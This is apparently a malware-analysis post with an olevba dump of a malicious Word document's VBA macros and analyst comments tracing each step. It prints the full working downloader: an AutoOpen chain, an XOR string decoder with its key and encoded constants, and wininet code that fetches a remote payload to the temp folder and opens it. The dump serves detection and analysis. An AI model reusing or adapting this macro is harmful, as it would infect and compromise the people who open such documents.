dynamoo

Malicious Word macro

Apr 2nd, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHBD skettd~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: skettd~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: skettd~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
      ' Auto-executing entry point: Word runs this procedure when the document is
      ' opened (olevba flags it as AutoExec/AutoOpen in the table below). Its only
      ' action is to call ZasimSimZa in module BYP6; that call starts the chain
      ' ZasimSimZa -> ETU2BUD3EM1 -> AUTO1AUTO2 -> VHOD1SU1 that does the real work.
  16. ZasimSimZa
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO BYP6.bas
  27. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BYP6'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  30. Public Function ZasimSimZa()
      ' Second link of the AutoOpen chain. RikoSHET is assigned and never read
      ' (filler). The only effective statement is the call to ETU2BUD3EM1 (module
      ' BEP4); both numeric arguments are ignored by that callee. The function
      ' never assigns its own return value.
  31. Dim RikoSHET As Long
  32. RikoSHET = 21
  33. ETU2BUD3EM1 414, 263
  34.  
  35. End Function
  36.  
  37. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  38. ANALYSIS:
  39. No suspicious keyword or IOC found.
  40. -------------------------------------------------------------------------------
  41. VBA MACRO BAP5.bas
  42. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BAP5'
  43. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  44.  
  45.  
  46. Public Function NUCHTOGTISTRASHNAYA(Per3vi4y7 As String, Vt4oro8y89 As String) As String
      ' String decoder used for every obfuscated constant in this document.
      '   Per3vi4y7  - key string (every caller in the dump passes C2332234325)
      '   Vt4oro8y89 - hex-encoded ciphertext, two hex digits per output byte
      ' Returns the plaintext: for i = 1 .. Len(ciphertext)/2, output byte i is
      ' the i-th hex pair XOR'd with the key character at ((i Mod Len(key)) + 1).
      ' G3eeeS3GE4W, Pet4rush5ka3 and SomeDate are dead arithmetic that never
      ' influences the result; they only pad the routine.
  47.    
  48.     Dim Eto4T6Ne9Kak23VSE0 As Integer
  49.     Dim Eto4T6Ne9Kak23VSE01 As Integer
  50.    
  51.    
  52.     Dim G3eeeS3GE4W As Double
  53.     G3eeeS3GE4W = 44.77
  54.     G3eeeS3GE4W = G3eeeS3GE4W + Abs(G3eeeS3GE4W)
  55.     Dim Eto4T6Ne9Kak23VSE As Long
  56.    
  57.     Dim Pet4rush5ka3 As Double
  58.     Dim Eto4T6Ne9Kak23VSEO As String
  59.    
  60.     Dim SomeDate As Date
  61.     SomeDate = DateAdd("yyyy", 4, "22/11/2003")
  62.    
  63.    
  64.     Pet4rush5ka3 = 0
      ' Op8Red7ElyAET3 (module BUP3) is a plain Len() wrapper, so the loop runs
      ' once per two-character hex pair of the ciphertext.
  65.             For Eto4T6Ne9Kak23VSE = 1 To _
  66.     ( _
  67.     Op8Red7ElyAET3 _
  68.     (Vt4oro8y89) _
  69.     / 2)
  70.     Pet4rush5ka3 = Pet4rush5ka3 + 0.1
      ' Ciphertext byte: hex pair at positions (2i-1, 2i) parsed via Val("&H..").
  71.         Eto4T6Ne9Kak23VSE0 = Val("&H" & _
  72.         (Mid$(Vt4oro8y89, _
  73.         (2 * Eto4T6Ne9Kak23VSE) - 1, 2)))
      ' Key byte: ASCII code of the key character at (i Mod Len(key)) + 1.
  74.         Eto4T6Ne9Kak23VSE01 = Asc(Mid$(Per3vi4y7, _
  75.         ((Eto4T6Ne9Kak23VSE Mod Len(Per3vi4y7)) + 1), 1))
      ' XOR and append one plaintext character.
  76.         Eto4T6Ne9Kak23VSEO = Eto4T6Ne9Kak23VSEO + Chr(Eto4T6Ne9Kak23VSE0 Xor Eto4T6Ne9Kak23VSE01)
  77.     Next Eto4T6Ne9Kak23VSE
  78.    NUCHTOGTISTRASHNAYA = Eto4T6Ne9Kak23VSEO
  79.    SomeDate = DateAdd("yyyy", 1, SomeDate)
  80.    
  81. End Function
  82.  
  83.  
  84.  
  85. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  86. ANALYSIS:
  87. +------------+----------------+-----------------------------------------+
  88. | Type       | Keyword        | Description                             |
  89. +------------+----------------+-----------------------------------------+
  90. | Suspicious | Chr            | May attempt to obfuscate specific       |
  91. |            |                | strings                                 |
  92. | Suspicious | Xor            | May attempt to obfuscate specific       |
  93. |            |                | strings                                 |
  94. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  95. |            |                | may be used to obfuscate strings        |
  96. |            |                | (option --decode to see all)            |
  97. +------------+----------------+-----------------------------------------+
  98. -------------------------------------------------------------------------------
  99. VBA MACRO BEP4.bas
  100. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BEP4'
  101. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  102.  
  103.  
  104. Public Const VEEWWWEE33211 = "601A0D1E5F4672041D5A5E560C415A025B" ' hex ciphertext; decoded with C2332234325 in VHOD1SU1 for the final CreateObject
  105. Public Const HR553366221 = "6F101D16570D035A5D18055743504B08" ' hex ciphertext; decoded in VHOD1SU1 and appended to the special-folder path (file name)
  106. Public Const WREGLEYSPEAR14 = "5B061C0209471C031E0055410A0102001B5B0258561852150D5C47455C1A015F5950435156420501581A075A1D171017" ' hex ciphertext; decoded in SomeFunct4 and passed as the URL to InternetOpenUrlA
  107. Public Const WREGLEYSPEAR13 = "60111A1B431C5A1A0A18715C01506014464708587C0A59170B06" ' hex ciphertext; decoded in VHOD1SU1 for the first CreateObject
  108. Public Const C2332234325 = "h3rhr3h3tm675m53m53m53" ' XOR key: first argument of every NUCHTOGTISTRASHNAYA call in the dump
  109.  
  110.  
  111.  
  112. Public Function RIKAKELLLE2(ByRef SAAARD1 As Object, SomeINCOME As Integer) As Object
      ' Returns SAAARD1.GetSpecialFolder(2). SomeINCOME is never used.
      ' NOTE(review): the only caller passes the object created from the decoded
      ' WREGLEYSPEAR13, on which DeleteFile and FileExists are later invoked, so it
      ' is presumably a Scripting.FileSystemObject, where folder id 2 is the
      ' temporary folder -- confirm by decoding the constant.
  113. Set RIKAKELLLE2 = SAAARD1.GetSpecialFolder(2)
  114. End Function
  115. Public Function ETU2BUD3EM1(RUFRUFRUF As Double, I9PUST5ESHE2 As Integer)
      ' Third link of the AutoOpen chain. Both parameters are unused; the string
      ' literal passed to AUTO1AUTO2 is likewise ignored by that routine. The
      ' function exists only to add a hop before VHOD1SU1.
  116.  
  117. AUTO1AUTO2 ("CA_LLS_AAAL_CSL_921_29")
  118. End Function
  119.  
  120.  
  121. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  122. ANALYSIS:
  123. +------------+----------------+-----------------------------------------+
  124. | Type       | Keyword        | Description                             |
  125. +------------+----------------+-----------------------------------------+
  126. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  127. |            |                | be used to obfuscate strings (option    |
  128. |            |                | --decode to see all)                    |
  129. | Suspicious | Dridex Strings | Dridex-encoded strings were detected,   |
  130. |            |                | may be used to obfuscate strings        |
  131. |            |                | (option --decode to see all)            |
  132. +------------+----------------+-----------------------------------------+
  133. -------------------------------------------------------------------------------
  134. VBA MACRO BOP2.bas
  135. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BOP2'
  136. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  137.  
  138. Public Const OOOAOOA12KNEV3 = "KKKALLLLISTO820**02**_____++++" ' not referenced by any procedure in the dumped modules; filler
  139.  
  140.  
  141. Public _
  142. Function AUTO1AUTO2(CEM7HAZ1 _
  143. As _
  144. String)
      ' Fourth link of the AutoOpen chain: ignores CEM7HAZ1 and calls VHOD1SU1.
      ' The line continuations in the signature carry no meaning beyond
      ' breaking up the text for keyword scanners.
  145. VHOD1SU1
  146. End Function
  147. Public Function VHOD1SU1()
      ' Main payload routine (last link of the AutoOpen chain).
      ' Sequence, ignoring the padding arithmetic:
      '   1. create an object from the decoded WREGLEYSPEAR13 (DeleteFile and
      '      FileExists are called on it later, so presumably a FileSystemObject);
      '   2. build a target path VEEQ332199 = special folder 2 & decoded HR553366221;
      '   3. delete that file if it already exists;
      '   4. call NEGIZNBILA(path), the wininet download routine in module BIP1;
      '   5. create a second object from the decoded VEEWWWEE33211 and call
      '      .Open on the downloaded path.
      ' The return values of NEGIZNBILA and of the later BMT74326784 checks are
      ' discarded, so execution continues regardless of download success.
  148.  
  149. Dim T929929T  As Object
  150. Set T929929T = CreateObject _
  151. (NUCHTOGTISTRASHNAYA(C2332234325, WREGLEYSPEAR13))
  152.  
  153.  
  154. Dim ADeeee11 As Double
  155.  
  156. ADeeee11 = 2232.5
  157. Dim FAAAAE5WT As Long
  158. FAAAAE5WT = Abs(ADeeee11)
  159.  
  160.  
  161. Dim RUBUBUBUBU2211 As Object
      ' Special folder object; the 3444 argument is ignored by RIKAKELLLE2.
  162. Set RUBUBUBUBU2211 = RIKAKELLLE2(T929929T, 3444)
  163. AD34BF54VC11 = 45.5 + 43
  164. Dim VEEQ332199
      ' Target path = folder object (default property) & decoded file name.
  165. ASDFKJF = NUCHTOGTISTRASHNAYA(C2332234325, HR553366221)
  166. VEEQ332199 = RUBUBUBUBU2211 & ASDFKJF
  167. Dim RU8FU7S4 As Integer
  168. FB2R3RWT4E5WT = Abs(AD34BF54VC11 + 12)
  169. Dim HI6M8A9DA0 As Integer
  170.  
  171. HI6M8A9DA0 = FB2R3RWT4E5WT - AD34BF54VC11
  172.  
      ' Remove a stale copy before downloading (BMT74326784 = FileExists).
  173. If BMT74326784(T929929T, VEEQ332199, 1425) Then
  174. T929929T. _
  175. DeleteFile VEEQ332199
  176. End If
      ' Download to the target path; the Boolean result is ignored.
  177. If NEGIZNBILA(VEEQ332199) Then
  178. End If
      ' SSSS is never declared or used elsewhere (no Option Explicit in this module).
  179. Set SSSS = Nothing
  180. If BMT74326784(T929929T, VEEQ332199, 2561) Then
  181. End If
      ' Second object type comes from the decoded VEEWWWEE33211; its .Open is
      ' invoked on the downloaded file.
  182. Set LPOOOO3222333 = CreateObject _
  183. (NUCHTOGTISTRASHNAYA _
  184. (C2332234325, VEEWWWEE33211))
  185. LPOOOO3222333.Open VEEQ332199
  186. End Function
  187.  
  188. Public Sub HHFOOEAKMMANNAN()
  189. '
  190. ' dddd Macro   (original comment is Cyrillic "Макрос", mis-encoded here as "Ìàêðîñ")
  191. ' ewh
  192. '
      ' Decoy: recorded-macro style formatting of the active Selection (type
      ' text, toggle bold/italic/underline, cycle highlight and font colours).
      ' It is not referenced by any other procedure in the dump and is not part
      ' of the AutoOpen chain; it likely exists only to look like a benign
      ' recorded macro.
  193.    Selection.TypeText Text:="hhehalkkcl "
  194.     Selection.TypeParagraph
  195.     Selection.TypeText Text:="sdfjjjfsdjkkdkfkk"
  196.     Selection.TypeParagraph
  197.     Selection.TypeText Text:="dskkdsfkkkfkk"
  198.     Selection.TypeParagraph
  199.     Selection.WholeStory
  200.     Selection.Font.Bold = wdToggle
  201.     Selection.Font.Italic = wdToggle
  202.     If Selection.Font.Underline = wdUnderlineNone Then
  203.         Selection.Font.Underline = wdUnderlineSingle
  204.     Else
  205.         Selection.Font.Underline = wdUnderlineNone
  206.     End If
      ' Same toggle a second time, which restores the previous underline state.
  207.     If Selection.Font.Underline = wdUnderlineNone Then
  208.         Selection.Font.Underline = wdUnderlineSingle
  209.     Else
  210.         Selection.Font.Underline = wdUnderlineNone
  211.     End If
  212.     Selection.Font.Italic = wdToggle
  213.     Selection.Font.Bold = wdToggle
  214.     Selection.Range.HighlightColorIndex = wdYellow
  215.     Options.DefaultHighlightColorIndex = wdBrightGreen
  216.     Selection.Range.HighlightColorIndex = wdBrightGreen
  217.     Options.DefaultHighlightColorIndex = wdTurquoise
  218.     Selection.Range.HighlightColorIndex = wdTurquoise
  219.     Options.DefaultHighlightColorIndex = wdPink
  220.     Selection.Range.HighlightColorIndex = wdPink
  221.     Options.DefaultHighlightColorIndex = wdTeal
  222.     Selection.Range.HighlightColorIndex = wdTeal
  223.     Selection.Font.Color = wdColorDarkTeal
  224.     Selection.Font.Color = wdColorLightOrange
  225.     Selection.Font.Color = wdColorDarkYellow
  226.     Selection.TypeBackspace
  227. End Sub
  228.  
  229. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  230. ANALYSIS:
  231. +------------+--------------+-----------------------------------------+
  232. | Type       | Keyword      | Description                             |
  233. +------------+--------------+-----------------------------------------+
  234. | Suspicious | CreateObject | May create an OLE object                |
  235. | Suspicious | Open         | May open a file                         |
  236. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  237. |            |              | be used to obfuscate strings (option    |
  238. |            |              | --decode to see all)                    |
  239. +------------+--------------+-----------------------------------------+
  240. -------------------------------------------------------------------------------
  241. VBA MACRO BUP3.bas
  242. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BUP3'
  243. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  244.  
  245. #If VBA7 And Win64 Then
      ' wininet.dll imports under obfuscated names; the Alias clause gives the real
      ' export so the names below map as:
      '   Kud2at3o        -> InternetCloseHandle
      '   Reb6ya7ta9      -> InternetOpenA
      '   Fiz6kul7tur2ra1 -> InternetReadFile
      '   ho7Ro8Vo5D1     -> InternetOpenUrlA
      ' This branch is the 64-bit Office variant (PtrSafe, LongPtr handles).
  246. Public Declare PtrSafe Function Kud2at3o Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
  247. Public Declare PtrSafe Function Reb6ya7ta9 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
  248. Public Declare PtrSafe Function Fiz6kul7tur2ra1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal etoeshekto23333 As LongPtr, ByVal REKOMDEDEBET1 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  249. Public Declare PtrSafe Function ho7Ro8Vo5D1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
  250. #Else
      ' 32-bit variant of the same four imports (plain Long handles).
  251. Public Declare Function Kud2at3o Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
  252. Public Declare Function Reb6ya7ta9 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
  253. Public Declare Function Fiz6kul7tur2ra1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal etoeshekto23333 As Long, ByVal REKOMDEDEBET1 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  254. Public Declare Function ho7Ro8Vo5D1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
  255. #End If
  256.  
  257. Public Function Op8Red7ElyAET3(AS1AeW2W3WW As String) As Integer
      ' Thin wrapper around Len(); used by NUCHTOGTISTRASHNAYA to size its loop.
      ' Note the Integer return type truncates lengths above 32767 (not an issue
      ' for the short constants in this document).
  258. Op8Red7ElyAET3 = Len(AS1AeW2W3WW)
  259. End Function
  260.  
  261.  
  262.  
  263. #If VBA7 _
  264.     And Win64 Then
  265.        Public Function SomeFunct4(ByRef RUKALICO87 As LongPtr, HLOPUSHKA6 As LongPtr, Hernya As String) As Boolean
  266.     #Else
  267.        Public Function SomeFunct4(ByRef RUKALICO87 As Long, HLOPUSHKA6 As Long, Hernya As String) As Boolean
  268.     #End If
      ' Opens the download URL.
      '   RUKALICO87 (out) - receives the HINTERNET from InternetOpenUrlA
      '   HLOPUSHKA6       - session handle from InternetOpenA (opened in NEGIZNBILA)
      '   Hernya           - unused
      ' The URL is the decoded WREGLEYSPEAR14. Always returns True, so the caller
      ' must inspect RUKALICO87 itself (NEGIZNBILA does: it checks for 0).
  269. Dim URLPURL1 As String
  270.     URLPURL1 = NUCHTOGTISTRASHNAYA(C2332234325, WREGLEYSPEAR14)
  271.    
      ' InternetOpenUrlA(hSession, url, headers = vbNullString, headersLen = 0,
      ' dwFlags = etoeshekto2, dwContext = 0).
      ' NOTE(review): etoeshekto2 is declared Private Const in module BIP1 and this
      ' module has no Option Explicit, so here it presumably resolves to an
      ' undeclared (Empty) variant, i.e. dwFlags = 0 rather than &H4000000 -- confirm.
  272.                 RUKALICO87 _
  273.     = ho7Ro8Vo5D1 _
  274.     ( _
  275.     HLOPUSHKA6, _
  276.     URLPURL1, vbNullString, _
  277.     0, _
  278.     etoeshekto2, 0)
  279.     SomeFunct4 = True
  280. End Function
  281.  
  282.  
  283. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  284. ANALYSIS:
  285. +------------+----------------+-----------------------------------------+
  286. | Type       | Keyword        | Description                             |
  287. +------------+----------------+-----------------------------------------+
  288. | Suspicious | Lib            | May run code from a DLL                 |
  289. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  290. |            |                | be used to obfuscate strings (option    |
  291. |            |                | --decode to see all)                    |
  292. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  293. |            |                | may be used to obfuscate strings        |
  294. |            |                | (option --decode to see all)            |
  295. | IOC        | wininet.dll    | Executable file name                    |
  296. +------------+----------------+-----------------------------------------+
  297. -------------------------------------------------------------------------------
  298. VBA MACRO BIP1.bas
  299. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BIP1'
  300. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  301. Option Explicit
  302.  
  303.  
  304. Private Const NENAKRASHENNAYA872 = 8162 ' chunk size: fixed-length read buffer and lNumBytesToRead for InternetReadFile
  305. Private Const NENAKRASHENNAYA871 As String = "Nu Pust Budet tak" ' sAgent passed to InternetOpenA, i.e. the HTTP User-Agent; a useful network detection artefact
  306. Private Const NENAKRASHENNAYA999 = 1 ' lAccessType for InternetOpenA (1 = INTERNET_OPEN_TYPE_DIRECT, no proxy)
  307. Private Const etoeshekto2 = &H4000000 ' intended as dwFlags for InternetOpenUrlA; Private here, yet referenced from module BUP3 (see SomeFunct4)
  308.  
  309. Public Function NEGIZNBILA _
  310. (ByVal PESNYABI As String) As Boolean
      ' Downloader: fetches the URL opened by SomeFunct4 over wininet and writes
      ' the bytes to the file PESNYABI (binary, write-only, write-locked).
      ' Returns True only if at least one byte was accumulated; returns False
      ' (the default) when InternetOpenA fails, or when the URL handle is 0.
      ' The two small For loops containing "Then End" can never fire (the loop
      ' ranges never reach 38 or 37) and are padding.
  311.     #If VBA7 _
  312.     And Win64 Then
  313.         Dim VMESTO2 As LongPtr, YABIL2 As LongPtr
  314.     #Else
  315.         Dim VMESTO2 As Long, YABIL2 As Long
  316.     #End If
  317.     Dim ETOTYAZABILDAVNO As Long
      ' REKOMDEDEBET1 is a fixed-length 8162-byte buffer; ETOTYAZABILDAVNO
      ' receives the bytes-read count from each InternetReadFile call.
  318.     Dim REKOMDEDEBET1 As String * NENAKRASHENNAYA872, POKORO4E As String
  319.     Dim SISKAPIR721 As Integer, DLINIYPAREN As Double
      ' InternetOpenA(agent, INTERNET_OPEN_TYPE_DIRECT, no proxy, no bypass, 0).
  320.     VMESTO2 = Reb6ya7ta9(NENAKRASHENNAYA871, NENAKRASHENNAYA999, vbNullString, vbNullString, 0)
  321.     If VMESTO2 = 0 Then
  322.         Exit Function
  323.     End If
  324.     Dim FiGaMan As Boolean
  325.    
      ' SomeFunct4 always returns True; the URL handle lands in YABIL2 by reference.
  326.     If SomeFunct4(YABIL2, VMESTO2, "Popkorn") Then
  327.     End If
  328.     If YABIL2 = 0 Then
  329.         DLINIYPAREN = 0
  330.     Else
      ' First read. NOTE: the whole 8162-byte buffer is copied here, not just the
      ' ETOTYAZABILDAVNO bytes actually read, so the dropped file can carry
      ' buffer padding after a short first chunk -- relevant when comparing the
      ' on-disk artefact against the served payload.
  331.         Fiz6kul7tur2ra1 YABIL2, REKOMDEDEBET1, NENAKRASHENNAYA872, ETOTYAZABILDAVNO
  332.         POKORO4E = REKOMDEDEBET1
      ' Subsequent reads append only the bytes reported read; stops at 0.
  333.         Do While ETOTYAZABILDAVNO <> 0
  334.             Fiz6kul7tur2ra1 YABIL2, REKOMDEDEBET1, NENAKRASHENNAYA872, ETOTYAZABILDAVNO
  335.            
  336.             Dim BEE999999332 As Long
  337. For BEE999999332 = 14 To 18
  338. If BEE999999332 = 38 Then End
  339. Next BEE999999332
  340.            
  341.             POKORO4E = POKORO4E + Mid(REKOMDEDEBET1, 1, ETOTYAZABILDAVNO)
  342.         Loop
  343.             DLINIYPAREN = Len(POKORO4E): SISKAPIR721 = FreeFile
      ' Write the accumulated bytes to PESNYABI in one Put.
  344.         Open PESNYABI _
  345.             For Binary Access Write _
  346.         Lock Write _
  347.         As #SISKAPIR721
  348.         Put #SISKAPIR721, _
  349.                 , POKORO4E
  350.         Dim HH457457547LLLL As Double
  351.             For HH457457547LLLL = 2 To 3
  352.     If HH457457547LLLL = 37 Then End
  353.                     Next HH457457547LLLL
  354.         Close #SISKAPIR721
  355.     End If
      ' InternetCloseHandle on the URL handle and the session handle.
  356.     Kud2at3o YABIL2
  357.     Kud2at3o VMESTO2
  358.     POKORO4E = ""
  359.     If DLINIYPAREN Then
  360.         NEGIZNBILA = True
  361.     End If
  362. End Function
  363.  
  364. Public Function BMT74326784(ByRef PLO9 As Object, ByVal ASXXX3 As String, Ribka As Integer) As Boolean
      ' Wrapper for PLO9.FileExists(ASXXX3); Ribka is unused. Used by VHOD1SU1
      ' to decide whether to delete a stale copy of the download target.
  365. If PLO9.FileExists(ASXXX3) Then
  366. BMT74326784 = True
  367. Else
  368. BMT74326784 = False
  369. End If
  370. End Function
  371.  
  372. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  373. ANALYSIS:
  374. +------------+-------------+-----------------------------------------+
  375. | Type       | Keyword     | Description                             |
  376. +------------+-------------+-----------------------------------------+
  377. | Suspicious | Open        | May open a file                         |
  378. | Suspicious | Write       | May write to a file (if combined with   |
  379. |            |             | Open)                                   |
  380. | Suspicious | Put         | May write to a file (if combined with   |
  381. |            |             | Open)                                   |
  382. | Suspicious | Binary      | May read or write a binary file (if     |
  383. |            |             | combined with Open)                     |
  384. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  385. |            |             | be used to obfuscate strings (option    |
  386. |            |             | --decode to see all)                    |
  387. +------------+-------------+-----------------------------------------+
  388. -------------------------------------------------------------------------------
  389. VBA MACRO UserForm1.frm
  390. in file: skettd~1.doc - OLE stream: u'Macros/VBA/UserForm1'
  391. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  392. (empty macro)